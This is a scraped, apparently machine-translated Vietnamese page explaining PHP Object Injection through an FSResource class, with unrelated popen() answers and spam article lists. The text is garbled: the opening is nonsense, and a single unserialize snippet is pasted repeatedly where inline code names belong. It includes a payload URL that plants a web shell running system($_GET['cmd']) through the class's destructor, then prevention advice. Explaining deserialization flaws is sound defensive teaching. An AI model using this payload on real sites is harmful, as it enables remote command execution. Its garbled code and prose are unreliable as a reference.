search

Ví dụ về deserialization php không an toàn

Ngày đăng: 07/12/2022
Trả lời: 0
Lượt xem: 20

Xin chào, bội hành động, bạn đã hạn chế thết rị hộ của popen() trong PHP. ក្រង្រ្រ្រ្រ្រង្រ្រ្រ. Cảm ơn các bạn không ghé thăm bài. com

Show

Làm cách nào để chạy tập lệnh PHP từ trình duyệt bằng Popen?

Gọi "trình bao bọc. php" từ trình duyệt cho phép popen ($cmd,"w") trong "real. php" hoạt động như mong đợi, sao cho thiết bị xuất chuẩn của $cmd đến được trình duyệt. Nếu bạn cố bỏ qua trình bao bọc và chỉ chạy "real. php", thiết bị xuất chuẩn của $cmd bị mất thành/dev/null. Lưu ý đối với người dùng Windows sử dụng popen bắt đầu chạy tập lệnh bên ngoài mà không cần đợi php

Đối số dòng lệnh trong Popen là gì?

Từ hướng dẫn lập trình viên popen linux. "Đối số lệnh là một con trỏ tới một chuỗi kết thúc null chứa dòng lệnh shell. Lệnh này được chuyển tới /bin/sh bằng cờ -c. "Vì php sử dụng chức năng popen này, bạn cần chắc chắn /bin/sh tồn tại. Tệp này có thể không tồn tại trong môi trường chroot ()ed

PHP sử dụng các hàm gốc serialize()

$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file
0 để tuần tự hóa và hủy tuần tự hóa một đối tượng. Ví dụ: tập lệnh sau tạo một thể hiện của đối tượng 
$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file
1, sắp xếp nó theo thứ tự và sau đó in biểu diễn chuỗi của đối tượng

path = $path;
        if (file_exists($path)) {
          $this->content = file_get_contents($path);
        }
    }

    function __destruct() {
        file_put_contents($this->path, $this->content);
    }

}

$resource = new FSResource('/tmp/file');
print(serialize($resource));

# Prints the following string representation:
# O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}

Sau đó, biểu diễn chuỗi có thể được giải tuần tự hóa một lần nữa để tạo lại thể hiện đối tượng và truy cập các thuộc tính của nó

$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file

ví dụ dễ bị tổn thương

Việc khai thác giải tuần tự hóa trong PHP được gọi là PHP Object Injection, xảy ra khi đầu vào do người dùng kiểm soát được chuyển làm đối số đầu tiên của hàm 

$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file
0. Đây là một 
$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file
3 dễ bị tổn thương

$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file

4 hoặc 
$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file

0 Các phương thức ma thuật PHP, được gọi khi đối tượng bị hủy hoặc giải tuần tự hóa, để gọi các tiện ích khác thực hiện các hành động độc hại trên hệ thống
Nếu lớp 
$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file

1 được xác định trong đoạn trên nằm trong phạm vi, kẻ tấn công có thể gửi một yêu cầu HTTP chứa một đại diện được tuần tự hóa của một đối tượng 
$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file

1 tạo tệp PHP độc hại tới 
$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file

3 với một 
$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file

4 tùy ý khi phương pháp ma thuật 
$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file

5 được gọi khi phá hủy
http://localhost/script.php?data=O:10:%22FSResource%22:2:{s:4:%22path%22;s:9:%22shell.php%22;s:7:%22content%22;s:27:%22%3C?php%20system($_GET[%22cmd%22]);%22;}





Tải trọng ở trên giải mã thành 
$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file

6 cho phép kẻ tấn công chạy các lệnh tùy ý trên hệ thống. Các tải trọng phức tạp hơn có thể được xây dựng bằng cách xâu chuỗi mã từ nhiều lớp hoặc sử dụng lại các chuỗi POP công khai, chẳng hạn như các chuỗi có trong các dự án PHPGCC
Phòng ngừa
Không bao giờ sử dụng hàm 
$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);

# Prints the path attribute:
# /tmp/file

0 trên đầu vào do người dùng cung cấp và tốt nhất là sử dụng các định dạng tuần tự hóa chỉ dành cho dữ liệu, chẳng hạn như JSON. Nếu bạn cần sử dụng PHP deserialization, tham số tùy chọn thứ hai đã được thêm vào trong PHP 7 cho phép bạn chỉ định danh sách cho phép của các lớp được phép
Người giới thiệu
Wikipedia - Serialization PHP - unserialize OWASP - PHP Object Injection POC 2009 - Stefan Esser - Tin sốc trong khai thác PHP BlackHat USA 2010 - Stefan Esser - Tận dụng việc tái sử dụng mã trong khai thác ứng dụng PHP PHPGCC
 















programming
php



















 














Bài Viết Liên Quan













Top 10 bộ phim kinh dị cấm chiếu năm 2024





Top 10 bộ phim kinh dị cấm chiếu năm 2024







mẹo hay
Top List
Top
Phim












Mã số thuế hộ kinh doanh là gì năm 2024





Mã số thuế hộ kinh doanh là gì năm 2024







là ai
Hỏi Đáp
Là gì












Hiện tượng tán sắc trong sợi quang là gì năm 2024





Hiện tượng tán sắc trong sợi quang là gì năm 2024







là ai
Hỏi Đáp
Là gì












Đề thi tốt nghiệp lớp 9 môn toán đà nẵng năm 2024





Đề thi tốt nghiệp lớp 9 môn toán đà nẵng năm 2024







mẹo hay












Bán nhà mt lê văn lương quận 7 năm 2024





Bán nhà mt lê văn lương quận 7 năm 2024







mẹo hay
Xây Đựng
Nhà












Hạt nhựa pp nguyên sinh là gì năm 2024





Hạt nhựa pp nguyên sinh là gì năm 2024







là ai
Hỏi Đáp
Là gì












Chúng sanh ở cực lạc sinh hoạt như thế nào năm 2024





Chúng sanh ở cực lạc sinh hoạt như thế nào năm 2024







mẹo hay
Hỏi Đáp
Thế nào












Có bầu con trai biểu hiện như thế nào năm 2024





Có bầu con trai biểu hiện như thế nào năm 2024







mẹo hay
Hỏi Đáp
Thế nào
Giới Tính
Trai












265 phố giắt tt triệu sơn thanh hóa năm 2024





265 phố giắt tt triệu sơn thanh hóa năm 2024







mẹo hay
FPT Triệu Sơn
MediaMart












Quy định về thời điểm xuất hóa đơn năm 2024





Quy định về thời điểm xuất hóa đơn năm 2024







mẹo hay


















Chiết khấu hối phiếu đòi nợ là gì năm 2024





Chiết khấu hối phiếu đòi nợ là gì năm 2024







là ai
Hỏi Đáp
Là gì












Đề toán 7 học kì 1 có đáp án năm 2024





Đề toán 7 học kì 1 có đáp án năm 2024







mẹo hay
Học Tốt
Học












Sạc pin hiện dấu chấm than trên android là gì năm 2024





Sạc pin hiện dấu chấm than trên android là gì năm 2024







là ai
Hỏi Đáp
Là gì
Công Nghệ
Android












Viết thư xin lỗi vì sự nhầm lẫn tiếng anh năm 2024





Viết thư xin lỗi vì sự nhầm lẫn tiếng anh năm 2024







mẹo hay
Học Tốt
Tiếng anh












Font chữ thư pháp việt hóa cho illustrator năm 2024





Font chữ thư pháp việt hóa cho illustrator năm 2024







mẹo hay












Nội thất tiếng trung là gì năm 2024





Nội thất tiếng trung là gì năm 2024







là ai
Hỏi Đáp
Là gì
Học Tốt
Tiếng trung












Có hóa đơn phí đăng ký mới xe ô tô năm 2024





Có hóa đơn phí đăng ký mới xe ô tô năm 2024







mẹo hay












Chuyên viên tư vấn khách hàng cá nhân là gì năm 2024





Chuyên viên tư vấn khách hàng cá nhân là gì năm 2024







là ai
Hỏi Đáp
Là gì












Bài hát anh phi công ơi tác giả nào năm 2024





Bài hát anh phi công ơi tác giả nào năm 2024







mẹo hay



























Quảng Cáo















Có thể bạn quan tâm










Bùi tiến dũng đào tạo trẻ ở thanh hóa năm 2024


1 ngày trước
. bởi
Self-containedAdvancement










Chị em gái như trái cau non là gì năm 2024


1 ngày trước
. bởi
CosmopolitanSemiconductor










Quạt tích điện của hãng nào tốt nhất năm 2024


1 ngày trước
. bởi
HushedPenguin










Review sách xấu thế nào đẹp ra sao năm 2024


1 ngày trước
. bởi
GloomyFeedback










Tội phạm là gì có bao nhiêu loại tội phạm năm 2024


1 ngày trước
. bởi
PromptInstructor










Top companies to work for in des moines năm 2024


1 ngày trước
. bởi
MetabolicComer










Could have would have should have khi nào dùng năm 2024


1 ngày trước
. bởi
HopefulOrientalism










Kha i niê m bản chất nhà nước là gì năm 2024


1 ngày trước
. bởi
RequisiteMisunderstanding










Văn phòng đăng ký quyền sử dụng đất thanh hóa năm 2024


1 ngày trước
. bởi
ClassicFormality










Bài tập về cấu trúc đặc biệt dạng so sánh năm 2024


1 ngày trước
. bởi
TaintedSlugger
















Toplist được quan tâm








#1




Top 9 tập bản đồ lớp 8 bài 31 2023

5 tháng trước







#2




Top 6 kết quả thi hsg đà nẵng 2022 2023

5 tháng trước







#3




Top 9 tủ nhựa đài loan 4 cánh 3d 2023

5 tháng trước







#4




Top 9 chất khí có thể làm mất màu dung dịch nước brom là: a. so2. b. co2. c. o2. d. hcl. 2023

5 tháng trước







#5




Top 8 tìm việc làm tiện, phay bảo q7 2023

5 tháng trước







#6




Top 3 tôi xuyên thành tiểu kiều the của lão đại phản 2 2023

5 tháng trước







#7




Top 9 đổi mới phong cách, thái độ phục vụ của cán bộ y tế hướng tới sự hài lòng của người bệnh 2023

5 tháng trước







#8




Top 2 bài the dục phát triển chung lớp 6 2022 2023

5 tháng trước







#9




Top 3 bài giảng vũ điệu sắc màu (lớp 4) 2023

5 tháng trước













Quảng cáo














Xem Nhiều










D là ký hiệu gì trong hóa học năm 2024


1 tuần trước
. bởi
PreposterousTheology










Nhà hàng phố đêm 346 phạm văn đồng năm 2024


6 ngày trước
. bởi
UnregulatedIntersection










Dùng ram như thế nào cho máy tính xem phim năm 2024


17 giờ trước
. bởi
DelightedWhereabouts










Bài 42 vật lí 9 sách bài tập năm 2024


5 ngày trước
. bởi
One-manReceptor










Qua tiêu hóa lipid sẽ được biến đổi thành gì năm 2024


3 ngày trước
. bởi
RabidContentment










Camera điều khiển tren không gọi là gì năm 2024


9 giờ trước
. bởi
SquareBrunt










Nguyên tắc khách quan là gì năm 2024


1 tuần trước
. bởi
MelancholyCylinder










Lỗi page fault in nonpaged area win 7 năm 2024


3 ngày trước
. bởi
ImplacableDriver










Rd trong tiếng anh là gì năm 2024


1 tuần trước
. bởi
EffortlessGoogle










25 đô là bao nhiêu tiền việt năm 2024


1 tuần trước
. bởi
MarineWidget










 


Quảng cáo











































Chúng tôi











Điều khoản











Trợ giúp











Mạng xã hội


















 DMCA.com Protection Status 







Bản quyền © 2021 Xây Nhà Inc.